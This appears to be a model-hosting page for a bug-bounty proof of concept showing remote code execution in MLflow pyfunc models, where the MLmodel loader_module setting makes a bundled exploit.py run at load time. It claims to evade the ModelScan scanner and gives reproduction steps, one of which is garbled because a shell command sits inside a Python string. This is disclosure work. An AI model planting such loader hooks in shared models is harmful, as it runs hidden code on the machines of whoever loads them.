MLFlow pyfunc RCE PoC
Format: MLFlow
Attack: loader_module + code_path โ importlib.import_module() โ RCE at model load time
How to reproduce:
pip install mlflow
python3 -c "
import mlflow.pyfunc
mlflow.pyfunc.load_model('.')
whoami > /tmp/pwned.txt
"
PoC files:
MLmodelโ specifiesloader_module: exploitandcode: code/code/exploit.pyโ top-level code runs atimporttime
Bypasses: ModelScan (protectai/modelscan) โ no scanner for MLmodel metadata
Submitted to: huntr.com MFV bounty
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐ Ask for provider support